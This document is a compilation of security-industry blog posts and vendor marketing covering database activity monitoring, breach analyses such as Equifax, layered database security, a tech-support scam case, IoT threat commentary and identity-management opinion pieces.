The benefit that a solution such as SecureSphere Database Activity Monitoring (DAM) provides is integrating the oversight of Amazon RDS into a broad view across all enterprise databases.  With SecureSphere, here are some things you can do to ensure the security of your data in the cloud:

Monitor Databases in Cloud Services

Use the same scalable architecture proven to cost-effectively monitor thousands of on-premises databases for your databases in AWS. For AWS, non-intrusive virtual appliances, deployed individually or in HA pairs, monitor network traffic and incorporate Amazon RDS audit data into a holistic enterprise-wide compliance dashboard.

Unify security policy

Deploy a common security and compliance policy for consistent security across on-premises and cloud databases. Secure and audit databases in the cloud and on-premises via one lens. Protect data in AWS with alerts and then block unauthorized activity.

Extend compliance to cloud databases

Demonstrate compliance with data protection and privacy regulations for databases in AWS. Provide unified audit reports across data in the cloud and on-premises. Get detailed reports for regulations such as SOX, PCI DSS and more.

Vulnerability Assessment—Detect Exposed Databases

SecureSphere Discovery and Assessment streamlines vulnerability assessment at the data layer. It provides a comprehensive list of over 1500 tests and assessment policies for scanning platform, software, and configuration vulnerabilities. Database assessments leverage Common Vulnerabilities Scoring System (CVSS) and the latest research from the Imperva Defense Center to assess database servers and assign a vulnerability severity level. Assessment scans can be run on-demand or at scheduled intervals, giving security teams the flexibility to scan when it least impacts IT operations. Assessment policies are available for a broad range of databases including Oracle, Microsoft SQL, IBM DB2 and more. The vulnerability assessment process, which can be fully customized, uses industry best practices such as DISA STIG and CIS benchmarks.

Database Auditing and Protection—The Next Step for Data Security

For complete visibility and control of user access to sensitive data, SecureSphere Discovery and Assessment can be extended to include database activity monitoring organizations can implement security policies to block or alert on attempts to exploit a vulnerability, providing virtual patch protection while software patches are developed by software vendors.

Conclusion

The need for quick panoramic visibility to the entire delivered application and data infrastructure, no matter where it is located, is paramount. Quick and coordinated control and mitigation are essential to bring the balance of defense back into the defender’s court.

Learn more about how Imperva solutions can help you ensure the safety of your database and enterprise-wide data.

2018 Cyberthreat Defense Report: Where IT Security Is Going

What keeps you awake at night? We asked IT security professionals the same question and found that these issues are top of mind: malware and spear phishing, securing mobile devices, employee security awareness and new technologies that detect threats capable of bypassing traditional signature-based defenses.

In previous years cyberattacks were on a steady and alarming rise. But now, data shows a year-over-year decrease in organizations being hit by at least one successful attack – down from 79.2 percent to 77.2 percent.

Yet there are still plenty of obstacles and challenges security teams need to overcome. A lack of skilled IT personnel is at the top of the list. So too is low security awareness among employees and the escalating crush of data.

But the security landscape is changing as cloud deployment and delivery make significant in-roads in cybersecurity. For example, deployment of the following security solutions in hybrid-cloud environments are:

  • 46% in DoS and DDoS prevention
  • 47% in privileged account or access management
  • 44% in security information and event management
  • 45% in web application firewall

The top three motivations for organizations investing in user and entity behavior analytics (UEBA) technology include the ability to detect account hijacking, privilege access abuse and defend against insider threats.

Enterprise security teams are beginning to realize that what they’ve done in the past is steadily losing ground to advancements by today’s threat actors. A renewed effort and investment is needed to move forward with an integrated security solution.

Despite security deployments such as WAFs, database firewalls and data encryption, online organizations still need help keeping their data safe.

Mostly they’re looking to improve blocking threats (58 percent) and improve detecting threats (51 percent). Other popular options include improving detecting threats, reducing unwanted traffic and improving enforcement of usage policies.

A Complete Solution

IT security continues to evolve as data and application breaches grow. For security teams getting in front of threats is key. Early detection, traffic analysis, forensics and customizable policies can make the difference for organizations to change its security posture from being reactive to being proactive.

For more information, download the full 2018 Cyberthreat Defense Report at www.imperva.com/go/cdr.

Securing Healthcare Data and Applications

The healthcare industry is quickly growing as a sweet spot for hackers to steal large amounts of patient records for profit. The US Department of Health and Human Services breach tool reports over 340 data breaches in 2017 impacting more than 3 million individuals, and 176.5 million individuals impacted since the federal tally commenced in 2009. While there was no large breach last year, such as the Anthem Blue Cross 78.8 million records breach, the number of breaches continues to increase. Hospitals are known to be a soft target making it easy for hackers to gather large amounts of patient data in a single hacking effort.

As cyberattacks and Internet threats continue to rise with the use of web-based healthcare portals and remote patient mobile technology, managing security and compliance across a distributed healthcare organization becomes a daunting task. A typical healthcare patient record includes name, address, social security number, birthdate and health history. With such a wide amount of personal data, a bad actor can open credit accounts or apply for medical care. While a person’s financial identity can be fully restored, healthcare data breaches have a much more personal and longer-lasting impact on victims.

In the end, the attacker’s ability to monetize is predicated upon either disrupting operations or stealing data. A data and application security solution provides the tools to protect your site and specifically to protect the privacy of patient records. These solutions protect the healthcare site from hackers who attempt to breach or disrupt the site and also provide protection to safeguard patient data.

Safeguard Patient Data

HIPAA and PCI regulations require that you protect patient health and financial data from unauthorized access and breaches. Even if an unauthorized individual gains access to the patient data, these Imperva Data Security solutions help you safeguard your sensitive data at the source across a broad range of data stores.

  • Discover sensitive data – To ensure that all sensitive data is protected, Imperva SecureSphere automates data discovery. It will scan the network to identify database services and servers and identify database instances that contain sensitive data.

Databases are scanned for vulnerabilities and misconfiguration, and vulnerabilities prioritized with remediation identified.

  • Monitor data usage activity – Imperva monitors and audits all data access activity, including privileged users and applications. Continuous monitoring detects and alerts you to unauthorized access, gives you details to take action, and allows you to instantly block access. SecureSphere also documents all incident findings and provides detailed reports for any audit purpose.
  • Identify risky users –Imperva CounterBreach employs machine learning to automatically uncover unusual data activity. It profiles both user and data activity to establish a baseline. Activity that deviates from that baseline can then be identified before threats become breaches.

The most risky users and assets are identified so that the most serious incidents are prioritized. You can then filter by priority and focus resources on those incidents.

  • Mask sensitive data – Sensitive data should not be exposed to those without a need to know. To reduce the risk of data breach and comply with data protection and privacy regulations, such as HIPAA and GDPR, Imperva Camouflage Data Masking provides a variety of techniques to mask data in non-production environments. First it automatically identifies and classifies sensitive data in your database. You can then use one of the pre-defined masking techniques or create custom data transformers to replace that sensitive data, with realistic fictional value, maintaining data utility without exposing sensitive information such as electronic health records (EHR) or electronic medical records (EMR).

Web Application Security

Imperva Web Application Firewall (WAF), named by Gartner as a leading WAF for four consecutive years, analyzes all user access to your web application and protects patient portals and health information exchanges (HIE) from cyberattacks. It protects against all web application attacks including OWASP top 10 threats and blocks malicious bots. It controls which visitors can access your application with traffic filtering based on a variety of factors.

DDoS Protection

DDoS protection automatically detects and mitigates attacks targeting websites and web applications. Imperva Incapsula is the only service to offer an SLA-backed guarantee to detect and block attacks in under 10 seconds. Our new Behemoth 2 platform blocked a 650 Gbps (Gigabit per second) DDoS flood with more than 150 Mpps (million packets per second), with capacity to spare. Besides handling large volumetric attacks, DDoS Protection specializes in mitigating complex application layer attacks.

Regulation Compliance

In addition to securing patient data these tools enable compliance with industry data protection and privacy regulations, such as HIPAA and PCI. Compliance can be a challenge for the healthcare organizations that must comply with the requirements that are spread over a number of regulations and mandates.

Imperva solutions provide continuous automated compliance with site and data protection and advanced audit and reporting tools. Please refer to the Healthcare Cyber Security Compliance Guide to find out more about how Imperva can provide compliance with regulations for requirements of database, file and web application security.

Hyperbole in Breach Reporting

While reading the news this morning about yet another successful data breach, I couldn't help but wonder if the hyperbole used in reporting about data breaches is stifling our ability to educate key stakeholders on what they really need to know.

Today's example is about a firm that many rely on for security strategy, planning, and execution. The article I read stated that they were "targeted by a sophisticated hack" but later explains that the attacker compromised a privileged account that provided unrestricted "access to all areas". And, according to sources, the account only required a basic password with no two-step or multi-factor authentication. That doesn't sound too sophisticated, does it? Maybe they brute-forced it, or maybe they just guessed the password (or found it written down in an office?)

It reminded me of an attack on a security vendor back in 2011. As I recall, there was a lot of talk of the sophistication and complexity of the attack. It was called an Advanced Persistent Threat (and maybe some aspects of it were advanced). But, when the facts came out, an employee simply opened an email attachment that introduced malware into the environment - again, not overly sophisticated in terms of what we think a hack to be.

The quantity, availability, and effectiveness of attack techniques are enough to make anyone uncomfortable with their security posture. I previously wrote about a German company who, in a breach response, wrote that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." CISOs are being told that they should expect to be breached. The only questions are about when and how to respond. It makes you feel like there's no hope; like there's no point in trying.

However, if you look at the two examples above that were described as highly sophisticated, they may have been avoided with simple techniques such as employee education, malware detection, and multi-factor authentication. I don't mean to over-simplify. I'm not saying it's all easy or that these companies are at-fault or negligent. I'm just calling for less hyperbole in the reporting. Call out the techniques that help companies avoid similar attacks. Don't describe an attack as overly sophisticated if it's not. It makes people feel even more helpless when, perhaps, there are some simple steps that can be taken to reduce the attack surface.

I'd also advocate for more transparency from those who are attacked. Companies shouldn't feel like they have to make things sound more complicated or sophisticated than they are. There's now a growing history of reputable companies (including in the security industry) who have been breached. If you're breached, you're in good company. Let's talk in simple terms about the attacks that happen in the real world. An "open kimono" approach will be more effective at educating others in prevention. And again, less hyperbole - we don't need to overplay to emotion here. Everyone is scared enough. We know the harsh reality of what we (as security professionals) are facing. So, let's strive to better understand the real attack surface and how to prioritize our efforts to reduce the likelihood of a breach.

Encryption would NOT have saved Equifax

I read a few articles this week suggesting that the big question for Equifax is whether or not their data was encrypted. The State of Massachusetts, speaking about the lawsuit it filed, said that Equifax "didn't put in safeguards like encryption that would have protected the data." Unfortunately, encryption, as it's most often used in these scenarios, would not have actually prevented the exposure of this data. This breach will have an enormous impact, so we should be careful to get the facts right and provide as much education as possible to law makers and really to anyone else affected.

We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.

I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.

Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.

The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.

Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.

100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.

Layered Database Security in the age of Data Breaches

We live in a time of daily breach notifications. One recently affected organization in Germany put out a statement which said: "The incident is not attributable to security deficiencies." and "Human error can also be ruled out." They went on say that it is "virtually impossible to provide viable protection against organized, highly professional hacking attacks." It's a tough climate we find ourselves in. It  just feels too hard or impossible at times. And there's some truth to that. There are way too many potential attack vectors for comfort.

Many breaches occur in ways that make it difficult to pinpoint exactly what might have prevented it. Or, the companies involved hide details about what actually happened or how. In some cases, they lie. They might claim there was some Advanced Persistent Threat on the network when in reality, it was a simple phishing attack where credentials were simply handed over.

In one recent case, a third party vendor apparently uploaded a database file to an unsecured Amazon AWS server. A media outlet covering the story called out that it was not hacking because the data was made so easily available. Numerous checkpoints come to mind that each could have prevented or lessened the damage in this scenario. I’d like to paint a picture of the numerous layers of defense that should be in place to help prevent this type of exposure.

Layer 1: Removing Production Data
The data should have been long removed from the database.
Assuming this is a non-production database (and I sure hope it is), it should have been fully masked before it was even saved as a file. Masking data means completely removing the original sensitive data and replacing it with fake data that looks and acts real. This enables safe use of the database for app development, QA, and testing. Data can be masked as it’s exported from the production database (most secure) or in a secure staging environment after the initial export. Had this step been done, the database could safely be placed on an insecure AWS server with limited security concerns because there’s no real data. An attacker could perhaps use the DB schema or other details to better formulate an attack on the production data, so I’m not recommending posting masked databases publicly, but the risk of data loss is severely limited once the data is masked.

Layer 2: Secure Cloud Server Configuration
The researcher should never have been able to get to the file.
A security researcher poking around the web should never have been able to access this database file. Proper server configuration and access controls should prevent unauthorized access to any files (including databases). In addition to documenting proper security configuration, certain Cloud Security Access Brokers can be used to continuously monitor AWS instances to ensure that server configurations match the corporate guidelines. Any instances of configuration drift can be auto-remediated with these solutions to ensure that humans don’t accidentally misconfigure servers or miss security settings in the course of daily administration.

Layer 3: Apply Database Encryption
Even with access to the database file, the researcher should not have been able to access the data.
At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.) Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

2016 broke security records, but 2017 is on track to be worse

It’s no secret that 2016 was a tough year for security and IT pros. From reported security issues behind the U.S. election to the Beautiful People hack, the year was plagued by countless breaches that …

The post 2016 broke security records, but 2017 is on track to be worse appeared first on DataGravity Blog.

Will you pay 300$ and allow scamsters remote control to your computer ! child play for this BPO

Microsoft customers in Arizona were scammed by a BPO setup by fraudsters who’s executives represented themselves as Microsoft employees and managed to convince them that for a 300$ charge they would enhance the performance of their desktop computers. 

Once signed up, the BPO technician logged onto using a remote access software that provided full remote control over the desktop and proceeded to delete the trash and cache file, sometimes scanning for personal information. The unsuspecting customer ended up with a marginal improvement in performance. After one year of operation, the Indian police nabbed the three men behind the operation and eleven of their employees.

There were several aspects to this case “Pune BPO which cheated Microsoft Clients in the US busted” that I found interesting:

1)    The ease with which customers were convinced to part with money and to allow an unknown third party to take remote control over their computer. With remote control one can also install malicious files to act as remote backdoor or spyware making the machine vulnerable.
2)    The criminals had in their possession a list of 1 million Microsoft customers with updated contact information
3)    The good fortune that the Indian government is unsympathetic to cybercrime both within and outside their shores which resulted in the arrests. In certain other countries crimes like these continue unhindered.

Cybercitizens should ensure that they do not surrender remote access to their computers or install software unless they come from trusted sources.


5 things you need to know about securing our future

“Securing the future” is a huge topic, but our Chief Research Officer Mikko Hypponen narrowed it down to the two most important issues is his recent keynote address at the CeBIT conference. Watch the whole thing for a Matrix-like immersion into the two greatest needs for a brighter future — security and privacy.

To get started here are some quick takeaways from Mikko’s insights into data privacy and data security in a threat landscape where everyone is being watched, everything is getting connected and anything that can make criminals money will be attacked.

1. Criminals are using the affiliate model.
About a month ago, one of the guys running CTB Locker — ransomware that infects your PC to hold your files until you pay to release them in bitcoin — did a reddit AMA to explain how he makes around $300,000 with the scam. After a bit of questioning, the poster revealed that he isn’t CTB’s author but an affiliate who simply pays for access to a trojan and an exploit-kid created by a Russian gang.

“Why are they operating with an affiliate model?” Mikko asked.

Because now the authors are most likely not breaking the law. In the over 250,000 samples F-Secure Labs processes a day, our analysts have seen similar Affiliate models used with the largest banking trojans and GameOver ZeuS, which he notes are also coming from Russia.

No wonder online crime is the most profitable IT business.

2. “Smart” means exploitable.
When you think of the word “smart” — as in smart tv, smartphone, smart watch, smart car — Mikko suggests you think of the word exploitable, as it is a target for online criminals.

Why would emerging Internet of Things (IoT) be a target? Think of the motives, he says. Money, of course. You don’t need to worry about your smart refrigerator being hacked until there’s a way to make money off it.

How might the IoT become a profit center? Imagine, he suggests, if a criminal hacked your car and wouldn’t let you start it until you pay a ransom. We haven’t seen this yet — but if it can be done, it will.

3. Criminals want your computer power.
Even if criminals can’t get you to pay a ransom, they may still want into your PC, watch, fridge or watch for the computing power. The denial of service attack against Xbox Live and Playstation Netwokr last Christmas, for instance likely employed a botnet that included mobile devices.

IoT devices have already been hijacked to mine for cypto-currencies that could be converted to Bitcoin then dollars or “even more stupidly into Rubbles.”

4. If we want to solve the problems of security, we have to build security into devices.
Knowing that almost everything will be able to connect to the internet requires better collaboration between security vendors and manufacturers. Mikko worries that companies that have never had to worry about security — like a toaster manufacturer, for instance — are now getting into IoT game. And given that the cheapest devices will sell the best, they won’t invest in proper design.

5. Governments are a threat to our privacy.
The success of the internet has let to governments increasingly using it as a tool of surveillance. What concerns Mikko most is the idea of “collecting it all.” As Glenn Glenwald and Edward Snowden pointed out at CeBIT the day before Mikko, governments seem to be collecting everything — communication, location data — on everyone, even if you are not a person of interest, just in case.

Who knows how that information may be used in a decade from now given that we all have something to hide?

Cheers,

Sandra

 

Deep Data Governance

One of the first things to catch my eye this week at RSA was a press release by STEALTHbits on their latest Data Governance release. They're a long time player in DG and as a former employee, I know them fairly well. And where they're taking DG is pretty interesting.

The company has recently merged its enterprise Data (files/folders) Access Governance technology with its DLP-like ability to locate sensitive information. The combined solution enables you to locate servers, identify file shares, assess share and folder permissions, lock down access, review file content to identify sensitive information, monitor activity to look for suspicious activity, and provide an audit trail of access to high-risk content.

The STEALTHbits solution is pragmatic because you can tune where it looks, how deep it crawls, where you want content scanning, where you want monitoring, etc. I believe the solution is unique in the market and a number of IAM vendors agree having chosen STEALTHbits as a partner of choice for gathering Data Governance information into their Enterprise Access Governance solutions.

Learn more at the STEALTHbits website.

IAM for the Third Platform

As more people are using the phrase "third platform", I'll assume it needs no introduction or explanation. The mobile workforce has been mobile for a few years now. And most organizations have moved critical services to cloud-based offerings. It's not a prediction, it's here.

The two big components of the third platform are mobile and cloud. I'll talk about both.

Mobile

A few months back, I posed the question "Is MAM Identity and Access Management's next big thing?" and since I did, it's become clear to me that the answer is a resounding YES!

Today, I came across a blog entry explaining why Android devices are a security nightmare for companies. The pain is easy to see. OS Updates and Security Patches are slow to arrive and user behavior is, well... questionable. So organizations should be concerned about how their data and applications are being accessed across this sea of devices and applications. As we know, locking down the data is not an option. In the extended enterprise, people need access to data from wherever they are on whatever device they're using. So, the challenge is to control the flow of information and restrict it to proper use.

So, here's a question: is MDM the right approach to controlling access for mobile users? Do you really want to stand up a new technology silo that manages end-user devices? Is that even practical? I think certain technologies live a short life because they quickly get passed over by something new and better (think electric typewriters). MDM is one of those. Although it's still fairly new and good at what it does, I would make the claim that MDM is antiquated technology. In a BYOD world, people don't want to turn control of their devices over to their employers. The age of enterprises controlling devices went out the window with Blackberry's market share.

Containerization is where it's at. With App Containerization, organizations create a secure virtual workspace on mobile devices that enables corporate-approved apps to access, use, edit, and share corporate data while protecting that data from escape to unapproved apps, personal email, OS malware, and other on-device leakage points. For enterprise use-case scenarios, this just makes more sense than MDM. And many of the top MDM vendors have validated the approach by announcing MAM offerings. Still, these solutions maintain a technology silo specific to remote access which doesn't make much sense to me.

As an alternate approach, let's build MAM capabilities directly into the existing Access Management platform. Access Management for the third platform must accommodate for mobile device use-cases. There's no reason to have to manage mobile device access differently than desktop access. It's the same applications, the same data, and the same business policies. User provisioning workflows should accommodate for provisioning mobile apps and data rights just like they've been extended to provision Privileged Account rights. You don't want or need separate silos.

Cloud

The same can be said, for cloud-hosted apps. Cloud apps are simply part of the extended enterprise and should also be managed via the enterprise Access Management platform.

There's been a lot of buzz in the IAM industry about managing access (and providing SSO) to cloud services. There have even been a number of niche vendors pop-up that provide that as their primary value proposition. But, the core technologies for these stand-alone solutions is nothing new. In most cases, it's basic federation. In some cases, it's ESSO-style form-fill. But there's no magic to delivering SSO to SaaS apps. In fact, it's typically easier than SSO to enterprise apps because SaaS infrastructures are newer and support newer standards and protocols (SAML, REST, etc.)

My Point

I guess if I had to boil this down, I'm really just trying to dispel the myths about mobile and cloud solutions. When you get past the marketing jargon, we're still talking about Access Management and Identity Governance. Some of the new technologies are pretty cool (containerization solves some interesting, complex problems related to BYOD). But in the end, I'd want to manage enterprise access in one place with one platform. One Identity, One Platform. I wouldn't stand up a IDaaS solution just to have SSO to cloud apps. And I wouldn't want to introduce an MDM vendor to control access from mobile devices.

The third platform simply extends the enterprise beyond the firewall. The concept isn't new and the technologies are mostly the same. As more and newer services adopt common protocols, it gets even easier to support increasingly complex use-cases. An API Gateway, for example, allows a mobile app to access legacy mainframe data over REST protocols. And modern Web Access Management (WAM) solutions perform device fingerprinting to increase assurance and reduce risk while delivering an SSO experience. Mobile Security SDKs enable organizations to build their own apps with native security that's integrated with the enterprise WAM solution (this is especially valuable for consumer-facing apps).

And all of this should be delivered on a single platform for Enterprise Access Management. That's third-platform IAM.

Virtual Directory as Database Security

I've written plenty of posts about the various use-cases for virtual directory technology over the years. But, I came across another today that I thought was pretty interesting.

Think about enterprise security from the viewpoint of the CISO. There are numerous layers of overlapping security technologies that work together to reduce risk to a point that's comfortable. Network security, endpoint security, identity management, encryption, DLP, SIEM, etc. But even when these solutions are implemented according to plan, I still see two common gaps that need to be taken more seriously.

One is control over unstructured data (file systems, SharePoint, etc.). The other is back door access to application databases. There is a ton of sensitive information exposed through those two avenues that aren't protected by the likes of SIEM solutions or IAM suites. Even DLP solutions tend to focus on perimeter defense rather than who has access. STEALTHbits has solutions to fill the gaps for unstructured data and for Microsoft SQL Server so I spend a fair amount of time talking to CISOs and their teams about these issues.

While reading through some IAM industry materials today, I found an interesting write-up on how Oracle is using its virtual directory technology to solve the problem for Oracle database customers. Oracle's IAM suite leverages Oracle Virtual Directory (OVD) as an integration point with an Oracle database feature called Enterprise User Security (EUS). EUS enables database access management through an enterprise LDAP directory (as opposed to managing a spaghetti mapping of users to database accounts and the associated permissions.)

By placing OVD in front of EUS, you get instant LDAP-style management (and IAM integration) without a long, complicated migration process. Pretty compelling use-case. If you can't control direct database permissions, your application-side access controls seem less important. Essentially, you've locked the front door but left the back window wide open. Something to think about.

Game-Changing Sensitive Data Discovery

I've tried not to let my blog become a place where I push products made by my employer. It just doesn't feel right and I'd probably lose some portion of my audience. But I'm making an exception today because I think we have something really compelling to offer. Would you believe me if I said we have game-changing DLP data discovery?

How about a data discovery solution that costs zero to install? No infrastructure and no licensing. How about a solution that you can point at specific locations and choose specific criteria to look for? And get results back in minutes. How about a solution that profiles file shares according to risk so you can target your scans according to need. And if you find sensitive content, you can choose to unlock the details by using credits which are bundle-priced.

Game Changing. Not because it's the first or only solution that can find sensitive data (credit card info, national ID numbers, health information, financial docs, etc.) but because it's so accessible. Because you can find those answers minutes after downloading. And you can get a sense for your problem before you pay a dime. There's even free credits to let you test the waters for a while.

But don't take our word for it. Here are a few of my favorite quotes from early adopters: 
“You seem to have some pretty smart people there, because this stuff really works like magic!”

"StealthSEEK is a million times better than [competitor]."

"We're scanning a million files per day with no noticeable performance impacts."

"I love this thing."

StealthSEEK has already found numerous examples of system credentials, health information, financial docs, and other sensitive information that weren't known about.

If I've piqued your interest, give StealthSEEK a chance to find sensitive data in your environment. I'd love to hear what you think. If you can give me an interesting use-case, I can probably smuggle you a few extra free credits. Let me know.



Data Protection ROI

I came across a couple of interesting articles today related to ROI around data protection. I recently wrote a whitepaper for STEALTHbits on the Cost Justification of Data Access Governance. It's often top of mind for security practitioners who know they need help but have trouble justifying the acquisition and implementation costs of related solutions. Here's today's links:

KuppingerCole -
The value of information – the reason for information security

Verizon Business Security -
Ask the Data: Do “hacktivists” do it differently?

Visit the STEALTHbits site for information on Access Governance related to unstructured data and to track down the paper on cost justification.